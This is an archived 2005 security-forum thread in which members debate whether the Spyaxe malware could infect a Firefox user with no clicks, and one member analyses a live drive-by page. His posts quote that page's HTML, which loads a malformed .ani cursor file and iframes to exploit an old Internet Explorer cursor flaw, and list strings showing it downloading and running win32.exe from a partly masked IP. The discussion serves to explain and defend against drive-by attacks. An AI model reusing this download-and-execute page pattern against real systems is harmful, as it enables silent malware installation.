Firefox and spyaxe

Discussion in 'other security issues & news' started by Mrkvonic, Dec 4, 2005.

Thread Status:
Not open for further replies.
  1. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,303
    Hello,

    I read and replied to this thread at Spyware Warrior:

    http://spywarewarrior.com/viewtopic.php?t=18115

    Long story short, a guy asks about the safest browser. In return to replies about Firefox and Opera, he is directed to a blog entry from a guy who says he got infected with spyaxe while innocently surfing with Firefox.

    I find it hard to believe. And I responded in the thread. I also think this could not have happened alone. Not without a click on a 'yes'.

    Would anyone care to set up an experiment in a virtual machine and try to simulate this? I really find it hard to believe that you can infected using Firefox in this fashion. An active response from the user must have been triggered.

    I would appreciate comments and suggestions.

    Mrk
     
  2. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    I find it really hard to believe too. A malware installation through a 0-day exploit in Firefox? Never heard of one. Of course I'm not saying this can't happen (Firefox is hardly the most secure piece of software in the world), but really... let's distinguish between installation through exploits and through user interaction. I didn't see anything in this thread that made me believe that this was an installation through a Firefox exploit.
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Hi Mrk,

    You may remember the URL posted a while back for people to try, where just going to the site triggered a download. It didn't work in Opera, because it didn't respond to the {CURSOR} or <iframe> tag - I don't know which. Here's the code from the page:

    ___________________________________________________
    <html>
    <head>
    <title>eXploit combo v1.1</title>
    <style>
    * {CURSOR: url("./exp_2/1.ani");}
    </style>
    </head>
    <body>

    <iframe src="./exp_4/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->

    <iframe src="./exp_sp6/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->

    <iframe src="./exp_3/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->

    </body>
    </html>
    __________________________________________________________

    However, using IE6, an attempted download started immediately, with no user action:

    http://www.rsjones.net/img/exploit.gif
    _______________________________________________________________

    This shows that drive-by downloads are possible. (Win32[1].exe was the trojan downloader executable).

    There are other script methods that may have gotten by Firefox. Without seeing the code, we don't know what happened in the case you refer to.

    I would never completely trust the browser, and would have something else in place to deal with situations like this.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  4. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Well, it seems like it started much more than just a download... the execution was launched (and then blocked by anti-executable). Just curious, did you click "OK" or anything and are you fully patched with the latest patches for your OS? 'Cause otherwise this is CLEARLY a working unpatched exploit in IE.
     
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    I didn't click anything.

    Using IE6 I went to the site again and observed more closely.
    This line in the code I posted executes the 1.ini file:

    * {CURSOR: url("./exp_2/1.ani");}

    http://www.rsjones.net/img/exploit2.gif
    _________________________________________________


    The ASCII strings from this file:
    _________________________________________
    GetProcAddress
    LoadLibrary
    GetSystemDirectory
    urlmon.dll
    URLDownloadToFile
    WinExec xxxx 195.xxx.xxx.xx/vx/win32.exe
    __________________________________________

    which downloads the executable. All done w/o any clicking. There is nothing to click -
    it's a blank web page except for the empty frames at the top:

    http://www.rsjones.net/img/exploit4.gif

    I use IE6 unpatched for testing, so that I can observe how these exploits work.

    But the thread is about Firefox, and the assumption was that there had to be user intervention,
    and I'm just showing that it's possible for a web site to execute script w/o any user action,
    and w/o testing the site and viewing the code, looking at the security settings of the browser,
    you can't make a blanket statement that the Spyaxe scenario couldn't have occurred using Firefox.

    Which is why I don't trust the browser to control scripts. There is always a new exploit just
    waiting to be discovered.

    Having something else behind the browser to block carrying out of such an exploit is a necessary safeguard, IMO.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  6. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    I didn't; all I was saying is that I am unaware of current Firefox exploits of this kind in the wild.

    And BTW there's a HUGE difference between a file getting downloaded and getting executed, don't you think? Did you know that in Firefox files are being downloaded in the browser cache while you're looking at the prompt before you even decide that you actually want to download the file? That's true. Except that's not an exploit at all, since the file doesn't get executed.
    I agree, but that doesn't mean a browser should execute files as it feels like. Executing a file without user intervention is an exploit, there is no doubt about it. An absolutely unacceptable behavior, and I am actually relieved to see that your IE was unpatched, otherwise it would mean we actually found in the wild another exploit taking advantage of an unpatched IE vulnerability.
     
    Last edited: Dec 4, 2005
  7. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    I realize what you are saying but for correctness let's speak vulnerabilities in regards to IE. These vulnerabilities can be exploited in an unpatched or a improperly secured IE via Active script....which is the majority of the vulnerability vector.
     
  8. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Uhmmm... ok. An "exploit taking advantage of an unpatched IE vulnerability". :D
     
    Last edited: Dec 4, 2005
  9. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    correct....or a user not knowing how to properly secure their browser :eek:

    As for the Firefox issue concerning this thread....it would be great if we knew everything about how and where users are coming across this malware. In some ways it would help to some degree in regards to all those great browser hijack volunteers. All we can do is educate each other no matter what program we are speaking of and no one regardless of what browser they use should ever get to warm and fuzzy of a feeling unless they do understand how they can be had while surfing.
     
  10. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    OK, sorry, I re-read what you wrote :doubt:

    Yes, and that's the normal behavior in all browsers, AFAIK. This is IE in a normal download:

    http://www.rsjones.net/img/exploit_IEdl.gif
    ____________________________________________________________

    But on the other site, if I turn off all other security programs and let everything run to completion, you will see that IE hangs with the status bar showing the downloading of the 1.ani file:

    http://www.rsjones.net/img/exploit8.gif
    _____________________________________________________________

    However, that .ani file has already downloaded and cached, as I showed in previous post.A fake error message displayed briefly ( you see the yellow ! in the Status Bar)

    Meanwhile, the Win32.file you saw in the cache has copied itself into System32 as Service.exe, and there was no prompt by the browser to Open|Save|Cancel Win32.exe:

    http://www.rsjones.net/img/exploit7.gif
    ______________________________________________________

    So, I don't know if this is peculiar to IE or not. I could not even get the page to dl the .ani file in Opera, so I couldn't test Opera, and I've not found anyone else set up to let everything run.

    Again, the fact that an exploit like this is possible is enough to make me leary of relying on the browser alone to alert for unwanted downloading of executables.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
    Last edited: Dec 4, 2005
  11. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,303
    Hello,
    I remember that page. And I remember trying it. Nothing happened. Simply nothing. With Firefox, that is.
    However, in this case, according to all posts given, I believe the user did click something - and thus circumvented the Firefox's inherent security. But that's the same as ignoring anti-virus, closing your firewall, clicking allow in a HIPS etc. I do not know of an exploit that after you simply visit a page using Firefox, your IE is hijacked, you get popups etc.
    And EVEN if such one exists, assuming that the English Guy only innocently browsed, altough paperghost does say there's a warning about the expired certificate, plus clicking 'yes', we do not know about the user's:
    version of Firefox and possible conflicts between versions
    version of Java and possible conflicts between versions
    O/S and the status of patches
    old MS Java
    All in all, it leaves a strange taste...
    I sometimes do happen to run across malicious pages, when I browse adult content, but this is nothing special: pages try to download stuff, so you get prompted to download. Just click 'cancel', and it's blocked. Other times, it's javascript, things like (javascript: execute.exe) hidden behind a would be image or alike, but using Noscript turns thing into nothing more than static background images with captions. I wonder how these would behave in IE.
    But either way, it requires a user to click, click, click, pull the trigger.
    Blank page, just visit and get infected? Find it hard to believe.
    Mrk
     
  12. que sera

    que sera Guest

    Well, I'm running FF, so does this mean with java script enabled I would get infected if I go to a site that contains a spyaxe script, even without having to agree to download or install something?
    I'd like to figure it out myself but unlike every Jack and Joe who unintentionaly gets his box infected I don't know where to pick up this little nasty. :(
    Am I allowed to ask for mailing me an URL (and don't worry, I do have VMware available to play with so there would be no risk)?

    Regards,
    qs
     
  13. This holds if you are using Javascript and Java too right?
     
  14. Really? I thought it was for firefox only. Your screenshot doesn't show this to be the case for IE BTW. What TNT means is that you click on a link to a file download, and while waiting for your response to save it to disk, the file downloads anyway.

    Is this the case for IE too? The way to test it would be to to look for a big file to download, click on it, wait for a while, then accept. The download should be instant or at least much faster.
     
  15. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Here is the thread where this URL was posted - see third post. Note the warnings about having a secure setup before going to the site.

    https://www.wilderssecurity.com/showthread.php?t=98653

    What was interesting was how many different results there were, depending on what security programs each person was running.

    Note Edwin024's comment that the page did nothing using Opera - that was my result also. I had to use IE to get the code to run.

    TNT and others did a good analysis of some of the files.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  16. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Well, live and learn... I knew it is the case for Firefox and Opera (which I use) and *assumed* it was for IE. In trying what you suggested, and you are right - it doesn't behave like FF and Opera.

    But the point I was making in the earlier post was that there was *no* prompt at all to dl the Win32.exe file - the file downloaded in the background.

    I re-did my test of that site to show how that was done, and since it's a bit off topic of this thread (it applies to IE), I've put it back in the other spyware site thread which discussed the site:

    https://www.wilderssecurity.com/showthread.php?p=624496#post624496

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  17. Yeah no biggie.

    Well yeah that's a different point. It's one thing for websites to make you 'download' stuff in the browser cache (whether firefox or IE), it's another to completely replace files in c:\windownt\system32 without user interaction.

    So it's some kind of exploit i think.
     
  18. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Yes that web site exploits the animated cursor vulnerability in IE, OE, Outlook. If allowed to run, the .ani file downloads the win32.exe file and copies to system32.

    According to Microsoft, WinXP SP2 is not vulnerable. Prior to that requires a patch. There are worse things that a cursor or icon file can do. See Microsoft Security Bulletin MS05-002

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  19. que sera

    que sera Guest

    Hi Rmus,

    thanks for helping me out. :) I did some experimenting with FF 1.0.7 and the new 1.5 but wasn't able to get my computer infected with spyaxe via that website. I'm realy curious what the english guy did to get that stuff.
    The testbox runs XPpro SP1 without any security software at all so when using IE I got infected immediately but had to allow at least active scripting. I got the full dosis of crap when also allowing ActiveX to run.

    Regards,
    qs
     
  20. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    I don't think you can ever know unless he posted step-by-step what happened.

    We feel secure that our programs are patched up-to-date and that we are protected. Then along comes something to throw doubt into that thought.

    In the situation referenced in the spyware site thread, this from an eeye.com advisory:
    ___________________________________________________________
    In the case of Internet Explorer, the user's system will be compromised
    when the user views a website that shows a malformed ANI file referenced
    via a style sheet in the HTML file.
    ___________________________________________________________


    It's not unusual to see statements like this in security bulletins
    (this one from Sophos Labs):
    ___________________________________________________________
    The security vulnerability, which is not yet patched by Microsoft,
    allows hackers to run malicious software (such as a Trojan, virus or worm)
    on a user's machines when they visit a website containing the exploit code.

    "Microsoft will be fuming that the security of their software is being brought
    into question before they have had a chance to issue a security patch," said
    Graham Cluley, senior technology consultant for Sophos.

    "It wouldn't be a surprise if more malware was distributed that took advantage
    of this vulnerability in Microsoft's code."
    ____________________________________________________________


    Even vulnerabilities in Opera and Firefox occur, albeit pretty quickly patched.

    I think Bubba's previous comment is worth repeating:

    "All we can do is educate each other no matter what program we are speaking of and no one regardless of what browser they use should ever get to warm and fuzzy of a feeling unless they do understand how they can be had while surfing."

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  21. Just as i thought remus.

    Nothing new. I always get confused by your posts about tests since i never know if you are running fully patched or not.
     
  22. It's quite interesting that moving a mouse cursor is enough to get you infected.
    I seem to recall a similar firefox bug related to this one.

    So sometimes when someone tell you he didn't click on anything or do anythign else, he might not be absolutely 100% correct. :)

    I think it's a still a serious exploit if it requires javascript to work. default out of box setting turn it on no?
     
  23. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    In the case I mentioned, it doesn't require moving the mouse - I tried just to be sure. It's Remote Code Execution that begins as soon as you load the page, triggering the downloading of the cursor (.ani) file. Doesn't need any scripting - as I had all scripting disabled anyway. Here's Microsoft writeup:

    Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution

    True, this is an old exploit and pretty well patched by now, but demonstrates that code execution w/o any user action is possible; there may other methods of remote code execution just waiting do be discovered.

    Which is why I go back to my original thought of not depending solely on the browser to prevent unwanted stuff to get into your system, since it's been demonstrated that it's possible to bypass browser security.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  24. Very old news, Remus. But I do enjoy reading posts where you learn something new to you and you present it like something revolutionary. :)

    This can be confusing, since a lot of times we think you are claiming something more or new , in this thread for example TNT had this problem. :)
     
  25. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Well, I did say it was an old example, but still shows how Remote Code Execution works. It's the only site I had available to demonstrate.

    But hark! a new example, if we can just find a site to test:

    Malicious Website / Malicious Code: Zero-day IE Exploit Update II

    "The websites discovered so far are using the vulnerability to install potentially unwanted software without the end-user's consent."

    Note the word install. Easily preventable, not by the browser, but by protection behind the browser, which is my point in all of this.

    And for Firefox:

    First Vulnerability for Firefox 1.5

    but probably will be fixed soon.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.